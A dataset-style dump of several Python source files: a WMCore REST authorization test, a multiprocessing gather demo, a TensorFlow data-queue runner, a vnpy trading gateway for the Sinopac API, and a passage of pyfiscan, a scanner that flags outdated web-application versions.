source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
Simple_t.py
|
# system modules
import cherrypy
from cheroot.test import webtest
from cherrypy import expose
from multiprocessing import Process
# WMCore modules
from WMCore.REST.Test import setup_dummy_server, fake_authz_headers
from WMCore.REST.Test import fake_authz_key_file
from WMCore.REST.Tools import tools
FAKE_FILE = fake_authz_key_file()
PORT = 8888
class Root:
def __init__(self, *args):
pass
@expose
def default(self):
return "foo"
@expose
@tools.cms_auth(role = "Global Admin", group = "global")
def global_admin(self):
return "ok"
class SimpleTest(webtest.WebCase):
def setUp(self):
self.h = fake_authz_headers(FAKE_FILE.data)
self.hglobal = fake_authz_headers(FAKE_FILE.data, roles = {"Global Admin": {'group': ['global']}})
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
stop_server(self.proc, self.engine)
def test_basic_fail(self):
self.getPage("/test")
self.assertStatus("403 Forbidden")
def test_basic_success(self):
self.getPage("/test", headers = self.h)
self.assertStatus("200 OK")
self.assertBody("foo")
def test_auth_fail(self):
self.getPage("/test/global_admin", headers = self.h)
self.assertStatus("403 Forbidden")
def test_auth_success(self):
self.getPage("/test/global_admin", headers = self.hglobal)
self.assertStatus("200 OK")
self.assertBody("ok")
def setup_server():
srcfile = __file__.split("/")[-1].split(".py")[0]
setup_dummy_server(srcfile, "Root", authz_key_file=FAKE_FILE, port=PORT)
def load_server(engine):
setup_server()
proc = Process(target=start_server, name="cherrypy_Api_t", args=(engine,))
proc.start()
proc.join(timeout=1)
return proc
def start_server(engine):
webtest.WebCase.PORT = PORT
cherrypy.log.screen = True
engine.start()
engine.block()
def stop_server(proc, engine):
cherrypy.log.screen = True
engine.stop()
proc.terminate()
if __name__ == '__main__':
webtest.main()
|
gather.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : gather.py
# Author : Jiayuan Mao
# Email : [email protected]
# Date : 02/16/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
import time
import multiprocessing as mp
from jacinle.comm.gather import make_gather_pair
from jacinle.utils.meta import map_exec_method
def mainloop_pull(pipe):
with pipe.activate():
while True:
msg = pipe.recv()
print('Received: worker_id=#{}, msg={}.'.format(msg['worker_id'], msg))
def mainloop_push(worker_id, pipe):
print('Initialized: worker_id=#{}.'.format(worker_id))
with pipe.activate():
while True:
msg = dict(text='Hello world!', time=time.strftime('%H:%M:%S'), worker_id=worker_id)
pipe.send(msg)
print('Sent: msg={}.'.format(msg))
time.sleep(1)
def main():
pull, pushs = make_gather_pair('jaincle-test', nr_workers=4, mode='ipc')
push_procs = [mp.Process(target=mainloop_push, args=(i, p)) for i, p in enumerate(pushs)]
map_exec_method('start', push_procs)
mainloop_pull(pull)
if __name__ == '__main__':
main()
|
queue_runner.py
|
import tensorflow as tf
import numpy as np
import time
import multiprocessing as mp
import threading
import Queue
class CustomRunner(object):
"""
This class manages the the background threads needed to fill
a queue full of data.
# Need to call the following code block after initializing everything
self.sess.run(tf.global_variables_initializer())
if self.use_tf_threading:
self.coord = tf.train.Coordinator()
self.net.train_runner.start_p_threads(self.sess)
tf.train.start_queue_runners(sess=self.sess, coord=self.coord)
"""
def __init__(self, arg_less_fn, override_dtypes=None,
n_threads=1, n_processes=3, max_size=30):
# arg_less_fn should be function that returns already ready data
# in the form of numpy arrays. The shape of the output is
# used to shape the output tensors. Should be ready to call at init_time
# override_dtypes is the typing, default to numpy's encoding.
self.data_fn = arg_less_fn
self.n_threads = n_threads
self.n_processes = n_processes
self.max_size = max_size
self.use_pool = False
# data_fn shouldn't take any argument,
# just directly return the necessary data
# set via the setter fn
data = self.data_fn()
self.inps = []
shapes, dtypes = [], []
for i, d in enumerate(data):
inp = tf.placeholder(dtype=d.dtype, shape=[None] + list(d.shape[1:]))
self.inps.append(inp)
# remove batching index for individual element
shapes.append(d.shape[1:])
dtypes.append(d.dtype)
# The actual queue of data.
self.tf_queue = tf.FIFOQueue(shapes=shapes,
# override_dtypes or default
dtypes=override_dtypes or dtypes,
capacity=2000)
# The symbolic operation to add data to the queue
self.enqueue_op = self.tf_queue.enqueue_many(self.inps)
def get_inputs(self, batch_size):
"""
Return's tensors containing a batch of images and labels
if tf_queue has been closed this will raise a QueueBase exception
killing the main process if a StopIteration is thrown in one of the
data processes.
"""
return self.tf_queue.dequeue_up_to(tf.reduce_min([batch_size, self.tf_queue.size()]))
def thread_main(self, sess, stop_event):
"""
Function run on alternate thread. Basically, keep adding data to the queue.
"""
tt_last_update = time.time() - 501
count = 0
tot_p_end = 0
processes_all_done = False
while not stop_event.isSet():
if tt_last_update + 500 < time.time():
t = time.time()
# 500 seconds since last update
#print("DataQueue Threading Update:")
#print("TIME: " + str(t))
# MP.Queue says it is not thread safe and is not perfectly accurate.
# Just want to make sure there's no leakage and max_size
# is safely hit
#print("APPROX SIZE: %d" % self.queue.qsize())
#print("TOTAL FETCH ITERATIONS: %d" % count)
tt_last_update = t
count += 1
if processes_all_done and self.queue.empty():
break
try:
data = self.queue.get(5)
except Queue.Empty:
continue
if type(data) == type(StopIteration()):
tot_p_end += 1
if tot_p_end == self.n_processes:
# Kill any processes
# may need a lock here if multithreading
processes_all_done = True
#print("ALL PROCESSES DONE")
continue
fd = {}
for i, d in enumerate(data):
fd[self.inps[i]] = d
sess.run(self.enqueue_op, feed_dict=fd)
self.queue.close()
def process_main(self, queue):
# Scramble seed so it's not a copy of the parent's seed
np.random.seed()
# np.random.seed(1)
try:
while True:
queue.put(self.data_fn())
except StopIteration as e:
# Should only manually throw when want to close queue
queue.put(e)
#raise e
return
except Exception as e:
queue.put(StopIteration())
#raise e
return
def set_data_fn(self, fn):
self.data_fn = fn
def start_p_threads(self, sess):
""" Start background threads to feed queue """
self.processes = []
self.queue = mp.Queue(self.max_size)
for n in range(self.n_processes):
p = mp.Process(target=self.process_main, args=(self.queue,))
p.daemon = True # thread will close when parent quits
p.start()
self.processes.append(p)
self.threads = []
self.thread_event_killer = []
for n in range(self.n_threads):
kill_thread = threading.Event()
self.thread_event_killer.append(kill_thread)
t = threading.Thread(target=self.thread_main, args=(sess, kill_thread))
t.daemon = True # thread will close when parent quits
t.start()
self.threads.append(t)
return self.processes + self.threads
def kill_programs(self):
# Release objects here if need to
# threads should die in at least 5 seconds because
# nothing blocks for more than 5 seconds
# Sig term, kill first so no more data
[p.terminate() for p in self.processes]
[p.join() for p in self.processes]
# kill second after purging
[e.set() for e in self.thread_event_killer]
|
sinopac_gateway.py
|
# encoding: UTF-8
import os
import sys
from copy import copy
from datetime import datetime
from threading import Thread
from time import sleep
import shioaji as sj
from shioaji.order import Status as SinopacStatus
from shioaji import constant
from shioaji.account import StockAccount, FutureAccount
from vnpy.trader.constant import (
Direction,
Exchange,
Product,
OptionType,
Status,
OrderType,
Offset
)
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest
)
EXCHANGE_VT2SINOPAC = {
Exchange.TSE: "TSE",
Exchange.TFE: "TFE",
Exchange.TFE: "TAIFEX"
}
EXCHANGE_SINOPAC2VT = {v: k for k, v in EXCHANGE_VT2SINOPAC.items()}
STATUS_SINOPAC2VT = {
SinopacStatus.Cancelled: Status.CANCELLED,
SinopacStatus.Failed: Status.REJECTED,
SinopacStatus.Filled: Status.ALLTRADED,
SinopacStatus.Filling: Status.PARTTRADED,
SinopacStatus.PreSubmitted: Status.SUBMITTING,
SinopacStatus.Submitted: Status.NOTTRADED,
SinopacStatus.PendingSubmit: Status.SUBMITTING,
SinopacStatus.Inactive: Status.SUBMITTING,
}
class SinopacGateway(BaseGateway):
"""
VN Trader Gateway for Sinopac connection
"""
default_setting = {
"身份證字號": "",
"密碼": "",
"憑證檔案路徑": "",
"憑證密碼": "",
"環境": ["正式", "模擬"],
"預設現貨帳號": "0",
"預設期貨帳號": "0"
}
exchanges = list(EXCHANGE_SINOPAC2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super(SinopacGateway, self).__init__(event_engine, "Sinopac")
self.subscribed = set()
self.userid = ""
self.password = ""
self.ticks = {}
self.code2contract = {}
self.trades = set()
self.count = 0
self.interval = 20
self.thread = Thread(target=self.query_data)
self.query_funcs = [self.query_position, self.query_trade]
self.api = sj.Shioaji()
def activate_ca(self, ca_path, ca_password, ca_id):
self.api.activate_ca(
ca_path=ca_path, ca_passwd=ca_password, person_id=ca_id)
def query_trade(self):
self.api.update_status()
trades = self.api.list_trades()
for item in trades:
if item.status in [SinopacStatus.Filling, SinopacStatus.Filled]: # 成交
tradeid = item.status.order_id
if tradeid in self.trades:
continue
self.trades.add(tradeid)
trade = TradeData(
symbol=f'{item.contract.code} {item.contract.name}',
exchange=EXCHANGE_SINOPAC2VT.get(
item.contract.exchange, Exchange.TSE),
direction=Direction.LONG if item.order.action == "Buy" else Direction.SHORT,
tradeid=tradeid,
orderid=item.order.seqno,
price=float(item.order.price),
volume=float(item.order.quantity),
time=item.status.order_datetime,
gateway_name=self.gateway_name,
)
self.on_trade(trade)
else:
order = OrderData(
symbol=f'{item.contract.code} {item.contract.name}',
exchange=EXCHANGE_SINOPAC2VT.get(
item.contract.exchange, Exchange.TSE),
orderid=item.order.seqno,
direction=Direction.LONG if item.order.action == "Buy" else Direction.SHORT,
price=float(item.order.price),
volume=float(item.order.quantity),
traded=float(item.status.deal_quantity),
status=STATUS_SINOPAC2VT[item.status.status],
time=item.status.order_datetime,
gateway_name=self.gateway_name,
)
self.on_order(order)
def query_data(self):
"""
Query all data necessary.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_position()
self.query_trade()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def connect(self, setting: dict):
userid = setting['身份證字號']
password = setting['密碼']
try:
self.api.login(userid, password)
except Exception as exc:
self.write_log(f"登入失败. [{exc}]")
return
self.write_log(f"登入成功. [{userid}]")
self.select_default_account(setting.get(
'預設現貨帳號', 0), setting.get('預設期貨帳號', 0))
self.query_contract()
self.write_log("合约查询成功")
self.query_position()
self.write_log("庫存部位查詢")
if setting['憑證檔案路徑'] != "":
self.activate_ca(setting['憑證檔案路徑'],
setting['憑證密碼'], setting['身份證字號'])
self.api.quote.set_callback(self.quote_callback)
self.write_log("交易行情 - 連線成功")
self.thread.start()
def select_default_account(self, select_stock_number, select_futures_number):
stock_account_count = 0
futures_account_count = 0
for acc in self.api.list_accounts():
if isinstance(acc, StockAccount):
self.write_log(
f'股票帳號: [{stock_account_count}] - {acc.broker_id}-{acc.account_id} {acc.username}')
stock_account_count += 1
if isinstance(acc, FutureAccount):
self.write_log(
f'期貨帳號: [{futures_account_count}] - {acc.broker_id}-{acc.account_id} {acc.username}')
futures_account_count += 1
if stock_account_count >= 2:
acc = self.api.list_accounts()[int(select_stock_number)]
self.api.set_default_account(acc)
self.write_log(
f"***預設 現貨下單帳號 - [{select_stock_number}] {acc.broker_id}-{acc.account_id} {acc.username}")
if futures_account_count >= 2:
acc = self.api.list_accounts()[int(select_futures_number)]
self.api.set_default_account(acc)
self.write_log(
f"***預設 期貨下單帳號 - [{select_futures_number}] {acc.broker_id}-{acc.account_id} {acc.username}")
def proc_account(self, data):
pass
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
def query_contract(self):
for category in self.api.Contracts.Futures:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TFE,
name=contract.name + contract.delivery_month,
product=Product.FUTURES,
size=200,
pricetick=contract.unit,
net_position=True,
min_volume=1,
gateway_name=self.gateway_name
)
self.on_contract(data)
self.code2contract[contract.code] = contract
for category in self.api.Contracts.Options:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TFE,
name=contract.name + contract.delivery_month,
product=Product.OPTION,
size=50,
net_position=True,
pricetick=contract.unit,
min_volume=1,
gateway_name=self.gateway_name,
option_strike=contract.strike_price,
option_underlying=contract.underlying_code,
option_type=OptionType.CALL if contract.option_right == "C" else OptionType.PUT,
option_expiry=None
)
self.on_contract(data)
self.code2contract[contract.code] = contract
for category in self.api.Contracts.Stocks:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TSE,
name=contract.name,
product=Product.EQUITY,
size=1,
net_position=False,
pricetick=contract.unit,
min_volume=1,
gateway_name=self.gateway_name
)
self.on_contract(data)
self.code2contract[contract.code] = contract
def subscribe(self, req: SubscribeRequest):
""""""
if req.symbol in self.subscribed:
return
contract = self.code2contract.get(req.symbol, None)
if contract:
self.api.quote.subscribe(contract)
self.api.quote.subscribe(contract, quote_type='bidask')
self.write_log('訂閱 {} {} {}'.format(
req.exchange.value, contract.code, contract.name))
self.subscribed.add(req.symbol)
else:
self.write_log("無此訂閱商品[{}].".format(str(req)))
def send_order(self, req: OrderRequest):
""""""
self.write_log("***send_order")
self.write_log(str(req))
if req.exchange == Exchange.TFE:
action = constant.ACTION_BUY if req.direction == Direction.LONG else constant.ACTION_SELL
price_type = constant.FUTURES_PRICE_TYPE_LMT
order_type = constant.FUTURES_ORDER_TYPE_ROD
order = self.api.Order(req.price, req.volume, action=action,
price_type=price_type,
order_type=order_type)
elif req.exchange == Exchange.TSE:
action = constant.ACTION_BUY if req.direction == Direction.LONG else constant.ACTION_SELL
price_type = constant.STOCK_PRICE_TYPE_LIMITPRICE
order_type = constant.STOCK_ORDER_TYPE_COMMON
first_sell = constant.STOCK_FIRST_SELL_YES if req.offset == Offset.CLOSETODAY else constant.STOCK_FIRST_SELL_NO
order = self.api.Order(price=req.price, quantity=int(req.volume), action=action,
price_type=price_type,
order_type=order_type, first_sell=first_sell)
trade = self.api.place_order(self.code2contract[req.symbol], order)
self.write_log(str(trade))
order = req.create_order_data(order.seqno, self.gateway_name)
self.write_log(str(order))
self.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
self.write_log("***cancel_order")
self.write_log(str(req))
def query_account(self):
""""""
self.write_log("***query_account")
def query_position(self):
""""""
self.api.get_stock_account_unreal_profitloss().update()
data = self.api.get_stock_account_unreal_profitloss().data()["summary"]
for item in data:
pos = PositionData(
symbol=f"{item['stock']} {item['stocknm']}",
exchange=EXCHANGE_SINOPAC2VT.get('TSE', Exchange.TSE),
direction=Direction.LONG if float(
item['real_qty']) >= 0 else Direction.SHORT,
volume=float(item['real_qty']) / 1000,
frozen=float(item['real_qty']) / 1000 -
float(item['qty']) / 1000,
price=float(item['avgprice']),
pnl=float(item['unreal']),
yd_volume=float(item['qty']) / 1000,
gateway_name=self.gateway_name
)
self.on_position(pos)
def close(self):
""""""
def quote_callback(self, topic, data):
"""
# L/TFE/TXFF9
{'Amount': [21088.0], 'AmountSum': [1028165646.0], 'AvgPrice': [10562.513699263414],
'Close': [10544.0], 'Code': 'TXFF9', 'Date': '2019/05/16', 'DiffPrice': [-37.0],
'DiffRate': [-0.34968339476419996], 'DiffType': [4], 'High': [10574.0],
'Low': [10488.0], 'Open': 10537.0, 'TargetKindPrice': 10548.47, 'TickType': [2],
'Time': '11:15:11.911000', 'TradeAskVolSum': 52599, 'TradeBidVolSum': 53721,
'VolSum': [97341], 'Volume': [2]}
# Q/TFE/TXFF9
{'AskPrice': [10545.0, 10546.0, 10547.0, 10548.0, 10549.0], 'AskVolSum': 262,
'AskVolume': [17, 99, 59, 45, 42], 'BidPrice': [10544.0, 10543.0, 10542.0, 10541.0, 10540.0],
'BidVolSum': 289, 'BidVolume': [16, 41, 32, 123, 77], 'Code': 'TXFF9', 'Date': '2019/05/16',
'DiffAskVol': [0, 0, 0, -1, 0], 'DiffAskVolSum': -1, 'DiffBidVol': [0, 0, 0, 0, 0], 'DiffBidVolSum': 0,
'FirstDerivedAskPrice': 10547.0, 'FirstDerivedAskVolume': 1, 'FirstDerivedBidPrice': 10542.0,
'FirstDerivedBidVolume': 1, 'TargetKindPrice': 10548.47, 'Time': '11:15:11.911000'}
# QUT/idcdmzpcr01/TSE/2330
{'AskPrice': [248.0, 248.5, 249.0, 249.5, 250.0], 'AskVolume': [355, 632, 630, 301, 429],
'BidPrice': [247.5, 247.0, 246.5, 246.0, 245.5], 'BidVolume': [397, 389, 509, 703, 434],
'Date': '2019/05/17', 'Time': '09:53:00.706928'}
"""
try:
topics = topic.split('/')
realtime_type = topics[0]
tick = None
if realtime_type == "L":
tick = self.qutote_futures_L(data)
elif realtime_type == "Q":
tick = self.quote_futures_Q(data)
elif realtime_type == "MKT":
tick = self.quote_stock_MKT(topics[3], data)
elif realtime_type == "QUT":
tick = self.qute_stock_QUT(topics[3], data)
if tick:
tick.open_interest = 0
self.on_tick(copy(tick))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
self.write_log('[{}][{}][{}][{}]'.format(
exc_type, filename, exc_tb.tb_lineno, str(e)))
self.write_log(data)
def quote_futures_Q(self, data):
code = data.get('Code', None)
if code is None:
return
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=data['Code'],
exchange=Exchange.TFE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.bid_price_1 = data["BidPrice"][0]
tick.bid_price_2 = data["BidPrice"][1]
tick.bid_price_3 = data["BidPrice"][2]
tick.bid_price_4 = data["BidPrice"][3]
tick.bid_price_5 = data["BidPrice"][4]
tick.ask_price_1 = data["AskPrice"][0]
tick.ask_price_2 = data["AskPrice"][1]
tick.ask_price_3 = data["AskPrice"][2]
tick.ask_price_4 = data["AskPrice"][3]
tick.ask_price_5 = data["AskPrice"][4]
tick.bid_volume_1 = data["BidVolume"][0]
tick.bid_volume_2 = data["BidVolume"][1]
tick.bid_volume_3 = data["BidVolume"][2]
tick.bid_volume_4 = data["BidVolume"][3]
tick.bid_volume_5 = data["BidVolume"][4]
tick.ask_volume_1 = data["AskVolume"][0]
tick.ask_volume_2 = data["AskVolume"][1]
tick.ask_volume_3 = data["AskVolume"][2]
tick.ask_volume_4 = data["AskVolume"][3]
tick.ask_volume_5 = data["AskVolume"][4]
return tick
def qutote_futures_L(self, data):
code = data.get('Code', None)
if code is None:
return
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract.get(code, None)
tick = TickData(
symbol=code,
exchange=Exchange.TFE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.datetime = datetime.strptime('{} {}'.format(
data['Date'], data['Time']), "%Y/%m/%d %H:%M:%S.%f")
tick.volume = data["VolSum"][0]
tick.last_price = data["Close"][0]
tick.limit_up = 0
tick.open_interest = 0
tick.limit_down = 0
tick.open_price = data["Open"]
tick.high_price = data["High"][0]
tick.low_price = data["Low"][0]
tick.pre_close = data["Close"][0] - data["DiffPrice"][0]
return tick
def quote_stock_MKT(self, code, data):
"""
QUT/idcdmzpcr01/TSE/2330
{'AskPrice': [248.0, 248.5, 249.0, 249.5, 250.0], 'AskVolume': [355, 632, 630, 301, 429],
'BidPrice': [247.5, 247.0, 246.5, 246.0, 245.5], 'BidVolume': [397, 389, 509, 703, 434],
'Date': '2019/05/17', 'Time': '09:53:00.706928'}
MKT/idcdmzpcr01/TSE/2330
{'Close': [248.0], 'Time': '09:53:00.706928',
'VolSum': [7023], 'Volume': [1]}
"""
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=code,
exchange=Exchange.TSE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
low_price=99999
)
self.ticks[code] = tick
tick.datetime = datetime.combine(datetime.today(),
datetime.strptime('{}'.format(data['Time']), "%H:%M:%S.%f").time())
tick.volume = data["VolSum"][0]
tick.last_price = data["Close"][0]
tick.limit_up = 0
tick.open_interest = 0
tick.limit_down = 0
tick.open_price = data["Close"][0] if tick.open_price == 0 else tick.open_price
tick.high_price = data["Close"][0] if data["Close"][0] > tick.high_price else tick.high_price
tick.low_price = data["Close"][0] if data["Close"][0] < tick.low_price else tick.low_price
tick.pre_close = tick.open_price
return tick
def qute_stock_QUT(self, code, data):
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=code,
exchange=Exchange.TSE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.bid_price_1 = data["BidPrice"][0]
tick.bid_price_2 = data["BidPrice"][1]
tick.bid_price_3 = data["BidPrice"][2]
tick.bid_price_4 = data["BidPrice"][3]
tick.bid_price_5 = data["BidPrice"][4]
tick.ask_price_1 = data["AskPrice"][0]
tick.ask_price_2 = data["AskPrice"][1]
tick.ask_price_3 = data["AskPrice"][2]
tick.ask_price_4 = data["AskPrice"][3]
tick.ask_price_5 = data["AskPrice"][4]
tick.bid_volume_1 = data["BidVolume"][0]
tick.bid_volume_2 = data["BidVolume"][1]
tick.bid_volume_3 = data["BidVolume"][2]
tick.bid_volume_4 = data["BidVolume"][3]
tick.bid_volume_5 = data["BidVolume"][4]
tick.ask_volume_1 = data["AskVolume"][0]
tick.ask_volume_2 = data["AskVolume"][1]
tick.ask_volume_3 = data["AskVolume"][2]
tick.ask_volume_4 = data["AskVolume"][3]
tick.ask_volume_5 = data["AskVolume"][4]
return tick
|
pyfiscan.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Pyfiscan is free web-application vulnerability and version scanner and can be
used to locate out-dated versions of common web-applications in Linux-servers.
Example use case is hosting-providers keeping eye on their users installations
to keep up with security-updates. Fingerprints are easy to create and modify as
user can write those in YAML-syntax.
@author Henri Salo <[email protected]>
@copyright Copyright (c) 2009-2018 Henri Salo
@license BSD
"""
from __future__ import division
import sys
try:
import csv
import logging
import os
import scandir
import time
import traceback
from docopt import docopt
from multiprocessing import Process, Queue, Pool
from multiprocessing.util import log_to_stderr
# internal imports
from database import Database
from detect import yaml_fn_dict
from file_helpers import \
filepaths_in_dir, validate_directory, check_dir_execution_bit, \
postprocess_php5fcgi
from issuereport import IssueReport, get_timestamp
except ImportError, error:
print('Import error: %s' % error)
sys.exit(1)
queue = Queue()
def populate_directory(fargs):
"""
Populates queue for workers. Consumes lots of disk I/O.
"""
directory, checkmodes = fargs
start_time = time.time()
try:
if not validate_directory(directory, checkmodes):
return time.time() - start_time
logging.debug('Populating: %s', directory)
for filename in filepaths_in_dir(directory, checkmodes):
for appname in database.issues:
for loc in database.locations(appname, with_lists=False):
if filename.endswith(loc):
queue.put((filename, loc, appname))
except Exception:
logging.error(traceback.format_exc())
return time.time() - start_time
def populate_file(fargs):
"""
Populates queue for works based on list of filenames from file.
"""
logging.debug('Entering populate_file')
filelist, checkmodes = fargs
start_time = time.time()
try:
if not os.path.isfile(filelist):
logging.debug('Location %s is not a file.', filelist)
return time.time() - start_time
logging.debug('Parsing filelist inside populate_file: %s', filelist)
with open(filelist) as f:
for file in f:
filename = file.strip()
for appname in database.issues:
for loc in database.locations(appname, with_lists=False):
if filename.endswith(loc):
logging.debug('Found: %s %s %s',filename,loc,appname)
queue.put((filename, loc, appname))
except Exception:
logging.error(traceback.format_exc())
return time.time() - start_time
def populate_userdir(fargs):
predefined_locations = ['www', 'secure-www']
userdir, checkmodes = fargs
locations = []
try:
userdir = os.path.abspath(userdir)
if not validate_directory(userdir, checkmodes):
return locations
public_html_location = userdir + '/public_html'
if validate_directory(public_html_location, checkmodes):
logging.debug('Appending to locations: %s', public_html_location)
locations.append(public_html_location)
sites_location = userdir + '/sites'
if validate_directory(sites_location, checkmodes):
for site in scandir.scandir(sites_location):
site = site.name
sitedir = sites_location + '/' + site
if checkmodes:
if not check_dir_execution_bit(sitedir):
continue
for predefined_directory in predefined_locations:
sites_location_last = sitedir + '/' + predefined_directory
if validate_directory(sites_location_last, checkmodes):
logging.debug('Appending to locations: %s', sites_location_last)
locations.append(sites_location_last)
except Exception:
logging.error(traceback.format_exc())
return locations
class PopulateScanQueue:
def populate(self, directories, checkmodes=False):
""" Populates worker queue for further scanning. Takes list of
directories to be scanned and checkmodes boolean if execution bit should be
taken into account. """
try:
# Use list of directories in loop to check if locations in data dictionary exists.
starttime = time.time()
p = Pool()
dirs = ((d, checkmodes) for d in directories)
p.map(populate_directory, dirs, chunksize=200)
queue.put(None) # All done. Sending kill signal.
p.close()
p.join()
logging.info('Scanning for locations finished. Elapsed time: %.4f', \
time.time() - starttime)
except OSError:
logging.error(traceback.format_exc())
sys.exit(traceback.format_exc())
except Exception:
logging.error(traceback.format_exc())
def populate_filelist(self, filelist, checkmodes=False):
try:
# Loop through and pass the files to the worker function
starttime = time.time()
logging.debug('Entered populate_filelist')
p = Pool()
files = ((f,checkmodes) for f in filelist)
p.map(populate_file, files, chunksize=200)
queue.put(None) # All done. Sending kill signal.
p.close()
p.join()
logging.info('Scanning for locations finished. Elapsed time: %.4f', \
time.time() - starttime)
except OSError:
logging.error(traceback.format_exc())
sys.exit(traceback.format_exc())
except Exception:
logging.error(traceback.format_exc())
def populate_predefined(self, startdir, checkmodes):
if not isinstance(startdir, str):
logging.debug('populate_predefined: value startdir not a string. "%s" with type %s' % (startdir, type(startdir)))
sys.exit('populate_predefined: value startdir not a string. "%s" with type %s' % (startdir, type(startdir)))
try:
logging.debug('Populating predefined directories: %s', startdir)
starttime = time.time()
p = Pool()
dirs = (startdir + '/' + d.name for d in scandir.scandir(startdir))
udirs = p.imap_unordered(populate_userdir, \
((d, checkmodes) for d in dirs), \
chunksize=200)
p.close()
p.join()
locations = [item for sublist in udirs for item in sublist]
logging.info('Total amount of locations: %s, time elapsed: %.4f', \
len(locations), time.time() - starttime)
self.populate(locations, checkmodes)
except Exception:
logging.error(traceback.format_exc())
def is_not_secure(secure_version, file_version, appname=None):
"""Comparison of version numbers.
secure_version: predefined value from YAML-files
file_version: found from file using grep
appname: used to separate different version numbering syntax
True when file_version < secure_version
False when file_version >= secure_version
"""
if secure_version == 'N/A':
return True
try:
if not all(isinstance(x, str) for x in (secure_version, file_version)):
raise TypeError('is_not_secure: input must be str when comparing. secure_version %s, file_version %s', \
type(secure_version), type(file_version))
if appname == 'WikkaWiki':
# Replace -p → .
# Example version number: 1.3.2-p7
secure_version = secure_version.replace('-p', '.')
file_version = file_version.replace('-p', '.')
return map(int, secure_version.split('.')) > map(int, file_version.split('.'))
except Exception:
logging.error(traceback.format_exc())
def handle_results(report, appname, file_version, item_location, application_cve, \
application_secure):
"""Main handler for all results found. Report is instance of IssueReport,
which handles .csv output.
"""
try:
logging.debug('%s with version %s from %s with vulnerability %s. This installation should be updated to at least version %s.', appname, file_version, item_location, application_cve, application_secure)
print('%s Found: %s %s → %s (%s)' % (get_timestamp(), item_location, file_version, application_secure, appname))
report.add(appname, item_location, file_version, application_secure, application_cve)
except Exception:
logging.error(traceback.format_exc())
def check_old_results(csv_file):
"""Handles old CSV result files and detects if applications have been
updated or not.
"""
report = IssueReport()
# Exit in case csv_file is symlink
if os.path.islink(csv_file):
sys.exit('CSV file %s is a symlink. Exiting..' % csv_file)
reader = csv.reader(open(csv_file, 'rb'), delimiter='|', quotechar='|')
database = Database('yamls/', includes=None)
total = 0
notfixed = 0
fixed = 0
for line in reader:
total += 1
appname = line[1]
file_location = line[2]
try:
for issue in database.issues[appname].itervalues():
for location in issue['location']:
# Loads fingerprint function from YAML file and checks for
# version from detected location
fn = yaml_fn_dict[issue['fingerprint']]
item_location = os.path.abspath(file_location + '/' + location)
if not os.path.exists(item_location):
fixed += 1
break
if not os.path.isfile(item_location):
break
print('Checking version from: %s' % (item_location))
file_version = fn(item_location, issue['regexp'])
if not file_version:
break
# item_location is stripped from application location so that
# we get cleaner output and actual installation directory
install_dir = item_location[:item_location.find(location)]
if is_not_secure(issue['secure_version'], file_version, appname):
# Calls result handler (goes to CSV and log)
handle_results(report, appname, file_version, file_location, issue['cve'], issue['secure_version'])
print('NOT FIXED: %s (%s)' % (install_dir, appname))
notfixed += 1
else:
print('FIXED: %s (%s)' % (install_dir, appname))
fixed += 1
except KeyError:
print traceback.format_exc()
pass
except TypeError:
print traceback.format_exc()
pass
if total == 0:
sys.exit('No lines in CSV file. Exiting..')
pers = fixed / total * 100
print '{0} of {1} have upgraded, which is {2:.2f}%.'.format(fixed, total, pers)
report.close()
def Worker(home_location, post_process):
"""This is the actual worker which calls smaller functions in case of
correct directory/file match is found.
- Takes and removes item from queue
- Detection in case of correct directory/file match is found
- Compares found version against secure version in YAML
- Calls logging
Every worker runs in a loop.
"""
# Opens file handle to CSV
try:
report = IssueReport()
except Exception:
report.close()
logging.error(traceback.format_exc())
return
while 1:
try:
item = queue.get()
if not item:
break
item_location, location, appname = item
logging.info('Processing: %s (%s)', appname, item_location)
for issue in database.issues[appname].itervalues():
logging.debug('Processing item %s with location %s with with appname %s issue %s', \
item_location, location, appname, issue)
# Loads fingerprint function from YAML file and checks for
# version from detected location
fn = yaml_fn_dict[issue['fingerprint']]
file_version = fn(item_location, issue['regexp'])
# Makes sure we don't go forward without version number from the file
if file_version:
# Tests that version from file is smaller than secure version
# with fingerprint function
logging.debug('Comparing versions %s:%s for item %s', \
issue['secure_version'], file_version, item_location)
if is_not_secure(issue['secure_version'], file_version, appname):
# Executes post processing. Does not do anything in case
# post_processing is not defined in yaml fingerprint.
# Do not do php5.fcgi check for public_html
if not home_location:
home_location = '/home'
if item_location[len(os.path.abspath(home_location)):].split('/')[:5][2] == 'public_html':
public_html_used = True
else:
public_html_used = False
